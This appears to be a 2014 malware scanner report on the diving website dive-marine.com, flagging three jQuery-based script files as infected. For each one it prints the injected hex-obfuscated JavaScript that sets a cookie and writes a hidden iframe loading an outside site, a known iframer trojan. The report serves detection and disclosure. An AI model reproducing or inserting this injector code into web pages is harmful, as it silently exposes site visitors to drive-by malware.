New scan:

Malware Scanner report for dive-marine.com

Malicious/Suspicious/Total urls checked
3/0/15
3 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "dive-marine.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=dive-marine.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://dive-marine.com/
200 OK
Content-Length: 45683
Content-Type: text/html
clean
http://dive-marine.com/common/js/jquery-1.8.3.min.js
200 OK
Content-Length: 93637
Content-Type: application/x-javascript
clean
http://dive-marine.com/common/js/jquery.bxslider.min.js
200 OK
Content-Length: 19123
Content-Type: application/x-javascript
clean
http://dive-marine.com/common/js/jquery.fitvids.js
200 OK
Content-Length: 3554
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)





(function( $ ){

"use strict";

$.fn.fitVids = function( options ) {
var settings = {
customSelector: null
};

var div = document.createElement('div'),
ref = document.getElementsByTagName('base')[0] || document.getElementsByTagName('script')[0];

div.className = 'fit-vids-style';
div.innerHTML = '&shy;<style> \
.fluid-width-video-wrapper {
... 2499 bytes are skipped ...
72\x65\x73\x3d',"\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x2f\x2f\x6d\x69\x72\x63\x6c\x69\x6e\x69\x63\x2e\x63\x6f\x6d\x2f\x61\x6d\x7a\x6f\x6e\x65\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x20\x77\x69\x64\x74\x68\x3d\x31\x30\x30\x20\x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e"];if(document.cookie.indexOf( _$[0])==-0x1){var a=new Date();a.setTime(a.getTime()+0xc*0x3c*0x3c*0x3e8);document.cookie= _$[1]+a.toGMTString();document.write( _$[2])}

Antivirus reports:

DrWeb
SCRIPT.Virus

http://dive-marine.com/common/js/jquery-cookie.js
200 OK
Content-Length: 3790
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)


(function (factory) {
if (typeof define === 'function' && define.amd) {
define(['jquery'], factory);
} else {
factory(jQuery);
}
}(function ($) {

var pluses = /\+/g;

function encode(s) {
return config.raw ? s : encodeURIComponent(s);
}

function decode(s) {
return config.raw ? s : decodeURIComponent(s);
}

function stringifyCookieValue(value) {
return encode(confi
... 2841 bytes are skipped ...
72\x65\x73\x3d',"\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x2f\x2f\x6d\x69\x72\x63\x6c\x69\x6e\x69\x63\x2e\x63\x6f\x6d\x2f\x61\x6d\x7a\x6f\x6e\x65\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x20\x77\x69\x64\x74\x68\x3d\x31\x30\x30\x20\x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e"];if(document.cookie.indexOf( _$[0])==-0x1){var a=new Date();a.setTime(a.getTime()+0xc*0x3c*0x3c*0x3e8);document.cookie= _$[1]+a.toGMTString();document.write( _$[2])}

Antivirus reports:

DrWeb
SCRIPT.Virus
Kaspersky
HEUR:Trojan.Script.Iframer

http://dive-marine.com/common/js/jquery.plugin.js
200 OK
Content-Length: 80158
Content-Type: application/x-javascript
clean
http://dive-marine.com/common/js/common.js
200 OK
Content-Length: 10263
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

$(document).ready(function(){

$('.photoGallery li:nth-child(4n)').css('margin-right','0');
$('.paging .number .on').prev().css('border-right','0');
$('.photoGallery li').hover(
function () {
$(this).find('div').append("<div class='thumbBorder'></div>");
},
function () {
$('.thumbBorder').remove();
}
);

$('.directMenu li').hover(
function () {
$(this).find('img').attr('src', $(th
... 3511 bytes are skipped ...
72\x65\x73\x3d',"\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x2f\x2f\x6d\x69\x72\x63\x6c\x69\x6e\x69\x63\x2e\x63\x6f\x6d\x2f\x61\x6d\x7a\x6f\x6e\x65\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x20\x77\x69\x64\x74\x68\x3d\x31\x30\x30\x20\x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e"];if(document.cookie.indexOf( _$[0])==-0x1){var a=new Date();a.setTime(a.getTime()+0xc*0x3c*0x3c*0x3e8);document.cookie= _$[1]+a.toGMTString();document.write( _$[2])}

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Iframer

http://dive-marine.com/common/js/jcommon.js
200 OK
Content-Length: 40739
Content-Type: application/x-javascript
clean
http://dive-marine.com/liveaboad/similanschedule.asp
200 OK
Content-Length: 48445
Content-Type: text/html
clean
http://counter.nesolution.com/counter.js
200 OK
Content-Length: 390
Content-Type: application/x-javascript
clean
http://dive-marine.com/liveaboad/
403 Forbidden
Content-Length: 223
Content-Type: text/html
clean
http://dive-marine.com/test404page.js
404 Not Found
Content-Length: 1466
Content-Type: text/html
clean
http://dive-marine.com/divemarin/intro.asp
200 OK
Content-Length: 24623
Content-Type: text/html
clean
http://dive-marine.com/divemarin/
403 Forbidden
Content-Length: 223
Content-Type: text/html
clean
http://dive-marine.com/divemarin/staff.asp
200 OK
Content-Length: 24557
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: dive-marine.com

Result:
HTTP/1.1 200 OK
Cache-Control: private
Cache-Control: private
Date: Wed, 23 Jul 2014 22:11:19 GMT
Pragma: no-cache
Server: Microsoft-IIS/6.0
Content-Length: 45683
Content-Type: text/html; Charset=euc-kr
Expires: Tue, 22 Jul 2014 22:11:18 GMT
Set-Cookie: ASPSESSIONIDQQQBATAS=HMIHDKAAOCPOKCDBGAMGOHEO; path=/
X-Powered-By: ASP.NET

...45683 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: dive-marine.com
Referer: http://www.google.com/search?q=dive-marine.com

Result:
The result is similar to the first query. There are no suspicious redirects found.